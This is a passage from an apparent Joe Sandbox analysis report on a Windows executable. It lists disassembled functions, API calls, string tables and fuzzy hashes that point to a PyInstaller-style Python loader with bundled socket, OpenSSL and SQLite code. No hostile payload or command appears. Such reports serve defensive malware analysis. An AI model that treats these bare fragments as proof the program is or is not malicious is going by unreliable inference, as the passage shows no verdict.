                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3458911817-0
                                                                                                                                                                                                                                  • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                  • Instruction ID: 807c0db034e7fbf72cd21f584035cc2bff27495446651293bd15c873eb4c4583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4551B132A0864286E711FF21DD821A9E362FF687A4FC44576EA0D43696DF3CE444CF60
                                                                                                                                                                                                                                  Function 00007FFBAA496424 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: listen
                                                                                                                                                                                                                                  • String ID: |i:listen
                                                                                                                                                                                                                                  • API String ID: 3257165821-1087349693
                                                                                                                                                                                                                                  • Opcode ID: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
                                                                                                                                                                                                                                  • Instruction ID: 4bfc29647a23036c5a6ddd68133d32b037b08b3381443cdd851aa587941936bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 236a73d6f59518f4dd2701652e7b01f649b09d785da2048cfb4d59739cfef329
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F015EA1A19A41C2F7068F72E5C002EA369BF84B80F244071EE5E43B24EF3DE4668710
                                                                                                                                                                                                                                  Function 00007FF72C655830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655840
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655852
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655889
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65589B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558B4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558C6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558DF
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558F1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65590D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65591F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65593B
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65594D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655969
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65597B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655997
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559A9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559C5
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                  • API String ID: 199729137-653951865
                                                                                                                                                                                                                                  • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                  • Instruction ID: eda8e9cb84964693718dd253f66033653bfa142b70d2fc38ce5af5868362422b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B22B164A09F07A1FA47BB55AC1A5B4A3A3FF647B1BE41835C51E02260FF3CA54D8F24
                                                                                                                                                                                                                                  Function 00007FF72C6576C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                  • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                  • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                  • Instruction ID: b00a13361c43f882c3d9dc7e2ff6d330094b8b229ca819b7d7d68bea95002607
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E02B324A1DB0B91EA17BB15BC19574A3A3FF647B4BE40831C52E022A4EF3CB14D8A34
                                                                                                                                                                                                                                  Function 00007FFBAA4940F0 Relevance: 33.5, APIs: 5, Strings: 14, Instructions: 244networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: htons
                                                                                                                                                                                                                                  • String ID: %s(): AF_HYPERV address must be tuple, not %.500s$%s(): AF_HYPERV address service_id is not a valid UUID string$%s(): AF_HYPERV address vm_id is not a valid UUID string$%s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): unsupported AF_HYPERV protocol: %d$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])$UU;AF_HYPERV address must be a str tuple (vm_id, service_id)
                                                                                                                                                                                                                                  • API String ID: 4207154920-3631354148
                                                                                                                                                                                                                                  • Opcode ID: 65c7fb5e1b5cb7743f2b7115a2606a9b17d437ac19ebb2a548de934386b24315
                                                                                                                                                                                                                                  • Instruction ID: ca4d1336d21a981c88a550ab27a94b77afebb0022e65bef825ba14417b537852
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65c7fb5e1b5cb7743f2b7115a2606a9b17d437ac19ebb2a548de934386b24315
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EC109B1A0AB42C5EB128F75D8C01BC27A8BB48B84F544176EE4E43665DF3DE466C361
                                                                                                                                                                                                                                  Function 00007FFBAA494F74 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 170COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddrFreeInfo$getaddrinfoinet_pton
                                                                                                                                                                                                                                  • String ID: 255.255.255.255$<broadcast>$address family mismatched$unknown address family$unsupported address family$wildcard resolved to multiple address
                                                                                                                                                                                                                                  • API String ID: 3456548859-1715193308
                                                                                                                                                                                                                                  • Opcode ID: e38dd31c2c705093840054c3f6f1944b26c7efcdfc5ee6327c49719d0f116eec
                                                                                                                                                                                                                                  • Instruction ID: 65e6c4555fd344a9a6d5c878a968f485d0cf8163cbec0d09a29e513d0f5baab2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e38dd31c2c705093840054c3f6f1944b26c7efcdfc5ee6327c49719d0f116eec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7771C5A1A09642C2F7228F35D4C427D23A8FB45B80F60427AFE4E436A5CF3CE566C751
                                                                                                                                                                                                                                  Function 00007FFBAA497BA8 Relevance: 24.7, APIs: 4, Strings: 10, Instructions: 162COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
                                                                                                                                                                                                                                  • String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$getnameinfo() argument 1 must be a tuple$getnameinfo(): flowinfo must be 0-1048575.$si|II;getnameinfo(): illegal sockaddr argument$sockaddr resolved to multiple addresses$socket.getnameinfo$surrogatepass
                                                                                                                                                                                                                                  • API String ID: 4001298222-243639936
                                                                                                                                                                                                                                  • Opcode ID: 8c926511a33a684e4fd5c2fa0c2c9a11c5c77bdf7478a1f8c49009de7e57055e
                                                                                                                                                                                                                                  • Instruction ID: 46f627e6f2d3e98e52c617db0687a09f45655bb14a83815ca843865fa8d5f1d5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c926511a33a684e4fd5c2fa0c2c9a11c5c77bdf7478a1f8c49009de7e57055e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03813EB2A09B46C6EB228F31E4C01AD73A8FB84B94F540276EE4D43668DF7CE556C750
                                                                                                                                                                                                                                  Function 00007FF72C6581D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF72C6586B7,?,?,00000000,00007FF72C653CBB), ref: 00007FF72C65822C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                  • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                  • Instruction ID: 7ef42902bd1cde71f8c84e3eb85ebb2b6a6ae9d11e0d93f16cb01c3d8ab3ec0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B518611A1C64281FA52BB65DC552B9E352FFB87E0FE44831D70E42AD5EE3CE5088F60
                                                                                                                                                                                                                                  Function 00007FF72C651600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                  • Opcode ID: 10ad1ac658e299a32776e4f5c7df64e1b6feaa7ef6c238e08fbfef3a4424164a
                                                                                                                                                                                                                                  • Instruction ID: 7a8256f425ef56693fea974cd6de1fa983b96e23732f8caa7f317c581f33775f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10ad1ac658e299a32776e4f5c7df64e1b6feaa7ef6c238e08fbfef3a4424164a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02519061B0864392EA12BB119C111B9A3A2FFA07F4FE44535EE1C07BD6DE3CE5498F60
                                                                                                                                                                                                                                  Function 00007FFBA60A5880 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007F6570
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                                                                  • API String ID: 118773457-1099454403
                                                                                                                                                                                                                                  • Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                  • Instruction ID: 9a7b53104b96b485d2394a07af2e1a9e2d7d1480de098e5b40ee394ad8e577a6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB4181F1E1AA0696E7638B34E99037827A2FB54F94F409436DE0DC7694DF2CE5A0C700
                                                                                                                                                                                                                                  Function 00007FFBA67E7760 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFBA67E7B14
                                                                                                                                                                                                                                  • Cannot add a UNIQUE column, xrefs: 00007FFBA67E789C
                                                                                                                                                                                                                                  • cannot add a STORED column, xrefs: 00007FFBA67E7A72
                                                                                                                                                                                                                                  • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFBA67E7C5C
                                                                                                                                                                                                                                  • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFBA67E78F7, 00007FFBA67E7973, 00007FFBA67E7A81
                                                                                                                                                                                                                                  • Cannot add a column with non-constant default, xrefs: 00007FFBA67E7969
                                                                                                                                                                                                                                  • Cannot add a PRIMARY KEY column, xrefs: 00007FFBA67E7881
                                                                                                                                                                                                                                  • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFBA67E790F
                                                                                                                                                                                                                                  • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFBA67E78ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
